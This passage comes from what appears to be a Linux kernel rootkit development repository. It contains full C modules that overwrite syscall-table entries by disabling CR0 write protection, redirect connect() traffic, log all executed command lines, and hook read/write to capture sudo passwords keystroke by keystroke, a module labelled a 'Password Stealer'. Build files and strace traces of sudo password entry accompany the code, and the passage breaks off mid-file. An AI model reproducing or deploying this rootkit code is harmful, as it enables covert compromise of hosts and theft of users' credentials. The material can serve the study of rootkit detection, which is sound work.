 * raw sin_port equals 0x5c11, it overwrites the port and address in the
 * local copy and writes that copy back over the caller's sockaddr in user
 * memory. The original handler is then called with the same pointer, so it
 * reads whatever the user buffer holds at that point.
 *
 * Observable effects: the caller's own sockaddr buffer differs after the
 * call, and a "Redirecting Traffic" line is added to the kernel log.
 *
 * NOTE(review): sizeof(struct sockaddr_in) bytes are read and written
 * whatever addrlen says, and the copy_from_user()/copy_to_user() return
 * values are ignored.
 * NOTE(review): PROTO is sin_family, an address family. With the TCP (0x2)
 * and UDP (0x1) macros defined earlier in this file, the "TCP" branch
 * matches AF_INET sockets of any transport and the "UDP" branch matches
 * family value 1, not UDP.
 */
asmlinkage int HookConnect(int fd, struct sockaddr __user *uservaddr, int addrlen){

  struct sockaddr_in addr;

  copy_from_user(&addr, uservaddr, sizeof(struct sockaddr_in));

  int IPHEX = addr.sin_addr.s_addr;
  // Raw sin_port value; it is not passed through ntohs() before use.
  unsigned short PORT = addr.sin_port;
  int PROTO = addr.sin_family;

  char *IpString = inet_ntoa(IPHEX);


  // Both printk() calls carry no KERN_* level and no trailing newline.
  if(PROTO == TCP){
    printk("TCP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT );
  }
  if(PROTO == UDP){
    printk("UDP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT );



  }

  // 0x5c11 is the raw sin_port the strace sample at the end of this file
  // writes as htons(4444), as it reads on a little-endian host.
  if (strcmp(IpString, "127.0.0.1") == 0 && (PORT == 0x5c11 ) ){
    addr.sin_port = 0xbb01; // raw sin_port for port 443 (0x01bb), same byte order as above
    addr.sin_addr.s_addr = 0x4ed73ad8; // Google IP in hex (per the author)

    // This PORT shadows the outer one. IpString was formatted before the
    // rewrite, so the log line shows the old address next to the new port.
    unsigned short PORT = addr.sin_port;
    printk("Redirecting Traffic to Another Port %s :: 0x%x ", IpString, PORT );
    copy_to_user(uservaddr , &addr, sizeof(struct sockaddr_in));




  }






  return ( *original_Connect ) (fd, uservaddr, addrlen);
}


/*
 * SetHooks - module init. Replaces the __NR_connect entry of the syscall
 * table with HookConnect and keeps the previous pointer in original_Connect.
 * Always returns 0.
 *
 * What it leaves behind on the host: two KERN_INFO lines in the kernel log,
 * and a syscall-table slot holding the address of a function from this
 * module rather than the handler the kernel installed.
 */
static int __init SetHooks(void) {
  // Resolve the table by symbol name.
  // NOTE(review): the result is not checked; if the lookup returns 0 the
  // indexing below dereferences a NULL table pointer.
  SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table");

  printk(KERN_INFO "Hooks Will Be Set.\n");
  printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);

  // EnablePageWriting()/DisablePageWriting() (defined earlier in this file)
  // clear and set bit 0x10000 of CR0, the x86 write-protect flag, around
  // the table write.
  EnablePageWriting();

  // Save the current __NR_connect handler, then point the slot at the hook.
  original_Connect = (void*)SYS_CALL_TABLE[__NR_connect];
  SYS_CALL_TABLE[__NR_connect] = (unsigned long*)HookConnect;
  DisablePageWriting();

  return 0;
}


/*
 * HookCleanup - module exit. Writes the saved original_Connect pointer back
 * into the __NR_connect slot, using the same CR0 toggle as SetHooks(), and
 * logs a message (the format string has no trailing newline).
 */
static void __exit HookCleanup(void) {

  // Restore the handler that was saved in SetHooks().
  EnablePageWriting();
  SYS_CALL_TABLE[__NR_connect] = (unsigned long*)original_Connect;
  DisablePageWriting();
  printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);



/*

https://github.com/torvalds/linux/blob/master/net/socket.c




int __sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen)
{
  int ret = -EBADF;
  struct fd f;

  f = fdget(fd);
  if (f.file) {
    struct sockaddr_storage address;

    ret = move_addr_to_kernel(uservaddr, addrlen, &address);
    if (!ret)
      ret = __sys_connect_file(f.file, &address, addrlen, 0);
    if (f.flags)
      fput(f.file);
  }

  return ret;
}

SYSCALL_DEFINE3(connect, int,
fd, struct sockaddr __user *, uservaddr, 195 | int, addrlen) 196 | { 197 | return __sys_connect(fd, uservaddr, addrlen); 198 | } 199 | 200 | 201 | enum sock_type { 202 | SOCK_STREAM = 1, 203 | SOCK_DGRAM = 2, 204 | SOCK_RAW = 3, 205 | SOCK_RDM = 4, 206 | SOCK_SEQPACKET = 5, 207 | SOCK_DCCP = 6, 208 | SOCK_PACKET = 10, 209 | }; 210 | 211 | 212 | retn from STRACE 213 | connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused) 214 | 215 | 216 | */ -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-19 2 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-39 3 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-49 4 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-9 5 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 
2 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module11_Hooking_execve/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module11_Hooking_execve/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module11_Hooking_execve/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #include 13 | #include 14 | 15 | MODULE_LICENSE("GPL"); 16 | MODULE_AUTHOR("SourceCodeDeleted"); 17 | 18 | // Special thanks to sticksxo 19 | 20 | MODULE_DESCRIPTION("Simple Hooking Password Stealer Syscall"); 21 | MODULE_VERSION("1.0"); 22 | 23 | 24 | unsigned long **SYS_CALL_TABLE; 25 | 26 | 27 | void EnablePageWriting(void){ 28 | write_cr0(read_cr0() & (~0x10000)); 29 | 30 | } 31 | void DisablePageWriting(void){ 32 | 
write_cr0(read_cr0() | 0x10000); 33 | 34 | } 35 | 36 | // EXECVE STRACE 37 | 38 | /* 39 | 40 | # sudo strace -u myusername sudo -k pwd 41 | execve("/bin/ls", ["ls", "-l"], 0x7ffc804d9e98 ) = 0 42 | execve("/usr/bin/sudo", ["sudo", "-k", "pwd"], 0x7ffdff5fec50 24 vars ) = 0 43 | access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 44 | 45 | ... 46 | ... 47 | ... 48 | write(4, "[sudo] password for myusername: ", 27[sudo] password for myusername: ) = 27 49 | write(4, "*", 1*) = 1 50 | read(4, "s", 1) = 1 51 | write(4, "*", 1*) = 1 52 | read(4, "d", 1) = 1 53 | write(4, "*", 1*) = 1 54 | read(4, "d", 1) = 1 55 | write(4, "*", 1*) = 1 56 | read(4, "a", 1) = 1 57 | write(4, "*", 1*) = 1 58 | read(4, "s", 1) = 1 59 | write(4, "*", 1*) = 1 60 | read(4, "d", 1) = 1 61 | write(4, "*", 1*) = 1 62 | read(4, "\n", 1) = 1 63 | write(4, "\10 \10", ) = 3 64 | write(4, "\10 \10", ) = 3 65 | write(4, "\10 \10", ) = 3 66 | write(4, "\10 \10", ) = 3 67 | write(4, "\10 \10", ) = 3 68 | write(4, "\10 \10", ) = 3 69 | write(4, "\10 \10", ) = 3 70 | write(4, "\10 \10", ) = 3 71 | alarm(0) = 0 72 | write(4, "\n", 1 73 | ) = 1 74 | ... 75 | ... 76 | ... 77 | openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 4 78 | 79 | 80 | */ 81 | /* 82 | 83 | Table 1. The User Space Memory Access API 84 | Function Description 85 | access_ok Checks the validity of the user space memory pointer 86 | get_user Gets a simple variable from user space 87 | put_user Puts a simple variable to user space 88 | clear_user Clears, or zeros, a block in user space 89 | copy_to_user Copies a block of data from the kernel to user space 90 | copy_from_user Copies a block of data from user space to the kernel 91 | strnlen_user Gets the size of a string buffer in user space 92 | strncpy_from_user Copies a string from user space into the kernel 93 | */ 94 | 95 | 96 | char char_buffer[255] = {0}; 97 | // Note: Do not name variables similar, especially globals. 
// The argc <-> argz <-> argv differ only in one char.
// and 2d array to hold arguments strings
// (argz and argc are not referenced by any function below.)
char argz[255][255] = {0};
// the count of arguments
size_t argc = 0;


// File-scope scratch buffers written by HookExecve() on every call; no
// locking is visible, so concurrent execve calls share them.
char CharBuffer [255] = {'\0'};
char Argz [255] = {'\0'};;




/* from: /usr/src/linux-headers-$(uname -r)/include/linux/syscalls.h */
// Saved pointer to the handler that was in the __NR_execve slot before SetHooks() ran.
asmlinkage int (*origional_execve)(const char *filename, char *const argv[], char *const envp[]);

/*
 * HookExecve - handler that SetHooks() installs in the __NR_execve slot.
 *
 * Copies the program path from user memory into CharBuffer and logs it,
 * logs up to 20 argv strings, logs an extra line when the path is exactly
 * "/usr/bin/sudo", then calls the original handler with the unmodified
 * arguments and returns its result.
 *
 * Side effect worth knowing on a host where this is loaded: every command
 * line, including any secrets passed as arguments, is written to the kernel
 * log at KERN_INFO ("Executable Name ..." / "Args ..." lines).
 *
 * NOTE(review): the copy_from_user() and strncpy_from_user() results for the
 * string copies are ignored, and CharBuffer is not cleared between calls. A
 * path or argument that does not fit in 255 bytes may leave the buffer
 * without a terminating NUL before it is printed with %s - TODO confirm.
 */
asmlinkage int HookExecve(const char *filename, char *const argv[], char *const envp[]) {

  copy_from_user(&CharBuffer , filename , strnlen_user(filename , sizeof(CharBuffer) - 1 ) );
  printk( KERN_INFO "Executable Name %s \n", CharBuffer );

  // Non-NULL placeholder so the first loop iteration runs; it is never dereferenced.
  char * ptr = 0xF00D;

  // The argument count is unknown, so read argv[] pointers until a NULL
  // entry is seen, for at most 20 entries. Once ptr becomes NULL the
  // remaining iterations do nothing.

  for (int i = 0 ; i < 20 ; i++){
    if(ptr){
      // Fetch the i-th argv pointer from user memory; 0 means fully copied.
      int success = copy_from_user(&ptr, &argv[i], sizeof(ptr));
      // A NULL pointer marks the end of argv.
      if(success == 0 && ptr){
        //printk( KERN_INFO "Pointer Name %px \n", ptr );
        strncpy_from_user(Argz, ptr , sizeof(Argz));
        printk( KERN_INFO "Args %s \n", Argz );
        memset(Argz, 0 ,sizeof(Argz));

      }
    }
  }
  // We need to check if SUDO is called.
  if( strcmp(CharBuffer , "/usr/bin/sudo" ) == 0 ){
    printk( KERN_INFO "Sudo Executed! ");

  }






  return (*origional_execve)(filename, argv, envp);
}



//TODO ssize_t write(int fd, const void *buf, size_t count);
// TODO check if write syscall containes the following:
// TODO "[sudo] password for"




// Saved pointer to the handler that was in the __NR_read slot before SetHooks() ran.
asmlinkage int (*original_read)(unsigned int, void __user*, size_t);

/*
 * HookRead - handler that SetHooks() installs in the __NR_read slot.
 *
 * As written it only forwards to the original handler and returns its
 * result; the body contains a disabled printk and a TODO, nothing else.
 * Even so, every read() on the host is routed through this module while it
 * is loaded.
 */
asmlinkage int HookRead(unsigned int fd, void __user* buf, size_t count) {
  //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!");

  //TODO Read if buffer one byte until byte == \n

  return (*original_read)(fd, buf, count);
}






/*
 * SetHooks - module init. Replaces the __NR_read and __NR_execve entries of
 * the syscall table with HookRead and HookExecve, keeping the previous
 * pointers in original_read and origional_execve. Always returns 0.
 *
 * What it leaves behind on the host: two KERN_INFO lines in the kernel log,
 * and two syscall-table slots holding addresses of functions from this
 * module rather than the handlers the kernel installed.
 */
static int __init SetHooks(void) {
  // Resolve the table by symbol name.
  // NOTE(review): the result is not checked; if the lookup returns 0 the
  // indexing below dereferences a NULL table pointer.
  SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table");

  printk(KERN_INFO "Hooks Will Be Set.\n");
  printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);


  // EnablePageWriting()/DisablePageWriting() (defined earlier in this file)
  // clear and set bit 0x10000 of CR0, the x86 write-protect flag, around
  // the table writes.
  EnablePageWriting();

  // Save each current handler, then point its slot at the hook.



  // KEEP THIS ORDER!!!
  // CRASH WILL HAPPEN
  // NOTE(review): the reason for the ordering requirement is not shown in this file.
  original_read = (void*)SYS_CALL_TABLE[__NR_read];
  SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead;

  origional_execve = (void*)SYS_CALL_TABLE[__NR_execve];
  SYS_CALL_TABLE[__NR_execve] = (unsigned long*)HookExecve;

  DisablePageWriting();

  return 0;
}







/*
 * HookCleanup - module exit. Writes the saved original_read and
 * origional_execve pointers back into their slots, using the same CR0
 * toggle as SetHooks(), and logs a message (the format string has no
 * trailing newline).
 */
static void __exit HookCleanup(void) {

  // Restore the handlers that were saved in SetHooks().
  EnablePageWriting();
  SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read;
  SYS_CALL_TABLE[__NR_execve] = (unsigned long*)origional_execve;
  DisablePageWriting();

  printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);
-------------------------------------------------------------------------------- /module11_Hooking_execve/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-1c9 2 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-1d9 3 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-1f9 4 | /home/krash/works/rootkitdev/module11_Hooking_execve/main.o-.text-209 5 | -------------------------------------------------------------------------------- 
/module12_Hooking_execve_altercmd/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #include 13 | #include 14 | 15 | MODULE_LICENSE("GPL"); 16 | MODULE_AUTHOR("SourceCodeDeleted"); 17 | 18 | // Special thanks to sticksxo 19 | 20 | MODULE_DESCRIPTION("Simple Hooking Password Stealer Syscall"); 21 | MODULE_VERSION("1.0"); 22 | 23 | 24 | unsigned long **SYS_CALL_TABLE; 25 | 26 | 27 | void EnablePageWriting(void){ 28 | write_cr0(read_cr0() & (~0x10000)); 29 | 30 | } 31 | void DisablePageWriting(void){ 32 | write_cr0(read_cr0() | 0x10000); 33 | 34 | } 35 | 36 | // EXECVE STRACE 37 | 38 | /* 39 | 40 | # sudo strace -u myusername sudo -k pwd 41 | execve("/bin/ls", ["ls", "-l"], 0x7ffc804d9e98 ) = 0 42 | execve("/usr/bin/sudo", ["sudo", "-k", "pwd"], 0x7ffdff5fec50 24 vars ) = 0 43 | access("/etc/suid-debug", 
F_OK) = -1 ENOENT (No such file or directory) 44 | 45 | */ 46 | char char_buffer[255] = {0}; 47 | // Note: Do not name variables similar, especially globals. 48 | // The argc <-> argz <-> argv differ only in one char. 49 | // and 2d array to hold arguments strings 50 | char argz[255][255] = {0}; 51 | // the count of arguments 52 | size_t argc = 0; 53 | 54 | char CharBuffer [255] = {'\0'}; 55 | char Argz [255] = {'\0'};; 56 | 57 | 58 | unsigned int RealCount = 0; 59 | 60 | /* from: /usr/src/linux-headers-$(uname -r)/include/linux/syscalls.h */ 61 | 62 | 63 | 64 | 65 | asmlinkage int (*origional_execve)(const char *filename, char *const argv[], char *const envp[]); 66 | asmlinkage int HookExecve(const char *filename, char *const argv[], char *const envp[]) { 67 | 68 | copy_from_user(&CharBuffer , filename , strnlen_user(filename , sizeof(CharBuffer) - 1 ) ); 69 | printk( KERN_INFO "Executable Name %s \n", CharBuffer ); 70 | 71 | char * ptr = 0xF00D; 72 | 73 | // Since we don't know the count of args we go until the 0 arg. 74 | // We will collect 20 args maximum. 75 | // 76 | 77 | for (int i = 0 ; i < 20 ; i++){ 78 | if(ptr){ 79 | 80 | int success = copy_from_user(&ptr, &argv[i], sizeof(ptr)); 81 | // Check for ptr being 0x00 82 | if(success == 0 && ptr){ 83 | RealCount ++; 84 | 85 | //printk( KERN_INFO "Pointer Name %px \n", ptr ); 86 | strncpy_from_user(Argz, ptr , sizeof(Argz)); 87 | printk( KERN_INFO "Args %s \n", Argz ); 88 | memset(Argz, 0 ,sizeof(Argz)); 89 | 90 | 91 | 92 | } 93 | } 94 | } 95 | printk("RealCount %d\n", RealCount); 96 | RealCount = 0; 97 | argc = RealCount + 1; 98 | 99 | 100 | // for(int i = 0 ; i < argc; i++){ 101 | // Insert ARGS here. 
102 | 103 | 104 | // } 105 | 106 | 107 | 108 | 109 | return (*origional_execve)(filename, argv, envp); 110 | } 111 | 112 | 113 | 114 | //TODO ssize_t write(int fd, const void *buf, size_t count); 115 | // TODO check if write syscall containes the following: 116 | // TODO "[sudo] password for" 117 | 118 | 119 | 120 | 121 | asmlinkage int (*original_read)(unsigned int, void __user*, size_t); 122 | asmlinkage int HookRead(unsigned int fd, void __user* buf, size_t count) { 123 | //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!"); 124 | 125 | //TODO Read if buffer one byte until byte == \n 126 | 127 | return (*original_read)(fd, buf, count); 128 | } 129 | 130 | 131 | 132 | 133 | 134 | 135 | static int __init SetHooks(void) { 136 | // Gets Syscall Table ** 137 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 138 | 139 | printk(KERN_INFO "Hooks Will Be Set.\n"); 140 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 141 | 142 | 143 | EnablePageWriting(); 144 | 145 | // Replaces Pointer Of Syscall_read on our syscall. 146 | 147 | 148 | 149 | // KEEP THIS ORDER!!! 
150 | // CRASH WILL HAPPEN 151 | original_read = (void*)SYS_CALL_TABLE[__NR_read]; 152 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead; 153 | 154 | origional_execve = (void*)SYS_CALL_TABLE[__NR_execve]; 155 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)HookExecve; 156 | 157 | DisablePageWriting(); 158 | 159 | return 0; 160 | } 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | static void __exit HookCleanup(void) { 169 | 170 | // Clean up our Hooks 171 | EnablePageWriting(); 172 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read; 173 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)origional_execve; 174 | DisablePageWriting(); 175 | 176 | printk(KERN_INFO "HooksCleaned Up!"); 177 | } 178 | 179 | module_init(SetHooks); 180 | module_exit(HookCleanup); -------------------------------------------------------------------------------- /module12_Hooking_execve_altercmd/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-1d9 2 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-1e9 3 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-209 4 | /home/krash/works/rootkitdev/module12_Hooking_execve_altercmd/main.o-.text-219 5 | -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/Makefile: 
-------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #include 13 | #include 14 | 15 | MODULE_LICENSE("GPL"); 16 | MODULE_AUTHOR("SourceCodeDeleted"); 17 | 18 | // Special thanks to sticksxo 19 | 20 | MODULE_DESCRIPTION("Simple Hooking Password Stealer Syscall"); 21 | MODULE_VERSION("1.0"); 22 | 23 | 24 | unsigned long **SYS_CALL_TABLE; 25 | // EnablePageWriting / DisablePageWriting: clear and set bit 16 (0x10000) of CR0 through read_cr0()/write_cr0(). On x86 that bit is CR0.WP (write protect); 26 | // with it cleared, supervisor-mode writes to read-only pages are no longer blocked. NOTE(review): CR0 is a per-CPU register and nothing here disables preemption or interrupts - confirm the callers cannot migrate between the two calls. 27 | void EnablePageWriting(void){ 28 | write_cr0(read_cr0() & (~0x10000)); 29 | 30 | } 31 | void DisablePageWriting(void){ 32 | write_cr0(read_cr0() | 0x10000); 33 | 34 | } 35 | 36 | // EXECVE STRACE 37 | 38 | /* 39 | 40 | # sudo strace -u myusername sudo -k pwd 41 | execve("/bin/ls", ["ls", "-l"], 0x7ffc804d9e98 ) = 0 42 | execve("/usr/bin/sudo", ["sudo", "-k", "pwd"], 0x7ffdff5fec50 24 vars ) = 0 43 | access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 44 | 45 | ... 46 | ... 47 | ... 
48 | write(4, "[sudo] password for myusername: ", 27[sudo] password for myusername: ) = 27 49 | write(4, "*", 1*) = 1 50 | read(4, "s", 1) = 1 51 | write(4, "*", 1*) = 1 52 | read(4, "d", 1) = 1 53 | write(4, "*", 1*) = 1 54 | read(4, "d", 1) = 1 55 | write(4, "*", 1*) = 1 56 | read(4, "a", 1) = 1 57 | write(4, "*", 1*) = 1 58 | read(4, "s", 1) = 1 59 | write(4, "*", 1*) = 1 60 | read(4, "d", 1) = 1 61 | write(4, "*", 1*) = 1 62 | read(4, "\n", 1) = 1 63 | write(4, "\10 \10", ) = 3 64 | write(4, "\10 \10", ) = 3 65 | write(4, "\10 \10", ) = 3 66 | write(4, "\10 \10", ) = 3 67 | write(4, "\10 \10", ) = 3 68 | write(4, "\10 \10", ) = 3 69 | write(4, "\10 \10", ) = 3 70 | write(4, "\10 \10", ) = 3 71 | alarm(0) = 0 72 | write(4, "\n", 1 73 | ) = 1 74 | ... 75 | ... 76 | ... 77 | openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 4 78 | 79 | 80 | */ 81 | /* 82 | 83 | Table 1. The User Space Memory Access API 84 | Function Description 85 | access_ok Checks the validity of the user space memory pointer 86 | get_user Gets a simple variable from user space 87 | put_user Puts a simple variable to user space 88 | clear_user Clears, or zeros, a block in user space 89 | copy_to_user Copies a block of data from the kernel to user space 90 | copy_from_user Copies a block of data from user space to the kernel 91 | strnlen_user Gets the size of a string buffer in user space 92 | strncpy_from_user Copies a string from user space into the kernel 93 | */ 94 | 95 | 96 | char char_buffer[255] = {0}; 97 | // Note: Do not name variables similar, especially globals. 98 | // The argc <-> argz <-> argv differ only in one char. 
99 | // and 2d array to hold arguments strings 100 | char argz[255][255] = {0}; 101 | // the count of arguments 102 | size_t argc = 0; 103 | 104 | 105 | char CharBuffer [255] = {'\0'}; 106 | char Argz [255] = {'\0'};; 107 | 108 | 109 | 110 | 111 | /* from: /usr/src/linux-headers-$(uname -r)/include/linux/syscalls.h */ 112 | asmlinkage int (*origional_execve)(const char *filename, char *const argv[], char *const envp[]); 113 | asmlinkage int HookExecve(const char *filename, char *const argv[], char *const envp[]) { 114 | 115 | copy_from_user(&CharBuffer , filename , strnlen_user(filename , sizeof(CharBuffer) - 1 ) ); 116 | //printk( KERN_INFO "Executable Name %s \n", CharBuffer ); 117 | 118 | char * ptr = 0xF00D; 119 | 120 | // Since we don't know the count of args we go until the 0 arg. 121 | // We will collect 20 args maximum. 122 | // 123 | 124 | for (int i = 0 ; i < 20 ; i++){ 125 | if(ptr){ 126 | int success = copy_from_user(&ptr, &argv[i], sizeof(ptr)); 127 | // Check for ptr being 0x00 128 | if(success == 0 && ptr){ 129 | //printk( KERN_INFO "Pointer Name %px \n", ptr ); 130 | strncpy_from_user(Argz, ptr , sizeof(Argz)); 131 | // printk( KERN_INFO "Args %s \n", Argz ); 132 | memset(Argz, 0 ,sizeof(Argz)); 133 | 134 | } 135 | } 136 | 137 | } 138 | // We need to check if SUDO is called. 139 | if( strcmp(CharBuffer , "/usr/bin/sudo" ) == 0 ){ 140 | printk( KERN_INFO "Sudo Executed! 
"); 141 | 142 | } 143 | 144 | 145 | 146 | 147 | 148 | 149 | return (*origional_execve)(filename, argv, envp); 150 | } 151 | 152 | 153 | 154 | //TODO ssize_t write(int fd, const void *buf, size_t count); 155 | // TODO check if write syscall containes the following: 156 | // TODO "[sudo] password for" 157 | 158 | 159 | 160 | char Password [255]; 161 | bool KeyLogger = 0; 162 | 163 | unsigned int TOTALREADCOUNT = 0; 164 | // HookRead: read replacement. Calls original_read first; if it returned 1 and fewer than 200 bytes were logged so far, and fd == 4 and count == 1, copies one byte from the user buffer with get_user() into Password[0] and prints it to the kernel log. Returns original_read's result unchanged. 165 | asmlinkage int (*original_read)(unsigned int fd, const char __user* buffer, size_t count); 166 | asmlinkage int HookRead (unsigned int fd, const char __user* buffer, size_t count) { 167 | //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!"); 168 | // READ works by reading a buffer. So technically the buffer isn't populated until the retn is complete. 169 | int ret = (*original_read)(fd, buffer, count); 170 | // NOTE(review): the fd/count filter is not tied to any process and the KeyLogger flag is not consulted here, so single-byte reads on fd 4 from any program are written to the kernel log in clear text. 171 | // Detection: lines starting with "Password " in the kernel log come from the printk below. 172 | if (ret == 1 && TOTALREADCOUNT < 200){ // Too much to read . Too dangerous to run. 173 | 174 | long unsigned int Ucount = count; 175 | long unsigned int Ufd = fd; 176 | char Letter = ""; 177 | 178 | 179 | if (Ufd == 4 && Ucount == 1){ 180 | 181 | get_user(Letter , buffer); 182 | Password[0] = Letter; 183 | 184 | char * pPassword = Password; 185 | printk("Password %ld | %s | %ld \n" ,Ufd ,pPassword, Ucount); 186 | TOTALREADCOUNT ++; 187 | } 188 | } 189 | 190 | 191 | 192 | 193 | return ret; 194 | } 195 | 196 | // HookWrite: write replacement. Only for nbytes == 27 it reads the user buffer (copy_from_user() of 27 bytes, Message zeroed, then the first 19 bytes one at a time with get_user()) and compares the result with "[sudo] password for"; 197 | // a match only logs "[+] Sudo Prompt Detected! Starting Logger!" because the KeyLogger assignment is commented out. Every call is forwarded to original_write. 198 | asmlinkage int (*original_write)(unsigned int fd, const char __user * buffer , size_t nbytes); 199 | asmlinkage int HookWrite (unsigned int fd, const char __user * buffer , size_t nbytes){ 200 | 201 | char * sudoprompt = "[sudo] password for"; 202 | char Message [255] = {'\0'}; 203 | long unsigned int Unbytes = nbytes; 204 | 205 | char CharCheck = ""; 206 | if(Unbytes == 27 ){ 207 | //printk("Password is being Typed? 
%ld \n", Unbytes); 208 | copy_from_user(&Message , buffer , 27 ); 209 | //printk("Message : %s \n" , Message); 210 | memset (Message , 0 , sizeof(Message)); 211 | 212 | for (int i = 0 ; i < 19 ; i++ ){ // Length of "[sudo] password for" 213 | get_user(CharCheck , buffer+i); 214 | Message[i] = CharCheck; 215 | 216 | } 217 | // printk("Message : %s \n" , Message); 218 | // memset (Message , 0 , sizeof(Message)); 219 | char * pMessage = Message; 220 | if( strcmp(sudoprompt, pMessage) == 0){ 221 | printk("[+] Sudo Prompt Detected! Starting Logger!\n"); 222 | 223 | //printk("Message : %s \n" , Message); 224 | memset (Message , 0 , sizeof(Message)); 225 | //KeyLogger = true; 226 | 227 | 228 | } 229 | 230 | 231 | // get_user(CharCheck , buffer); 232 | // char * pCharCheck = CharCheck; 233 | // if(strcmp(pCharCheck, Astrisk) == 0 ){ 234 | // printk("Password is being Typed? \n"); 235 | 236 | 237 | // } 238 | // get_user(CharCheck , buffer); 239 | // if(CharCheck > 0x32 && CharCheck < 0x7a){ 240 | // copy_from_user(&Message , buffer , sizeof(buffer) ); 241 | // printk("Message : 